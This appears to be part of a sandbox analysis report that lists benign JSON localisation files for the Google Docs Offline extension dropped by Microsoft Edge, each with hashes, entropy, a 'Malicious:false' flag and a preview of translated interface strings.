                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                      MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                      SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                      SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                      SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1305
                                                                                                                                                                                                                                                      Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                      MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                      SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                      SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                      SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):911
                                                                                                                                                                                                                                                      Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                      MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                      SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                      SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                      SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):939
                                                                                                                                                                                                                                                      Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                      MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                      SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                      SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                      SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
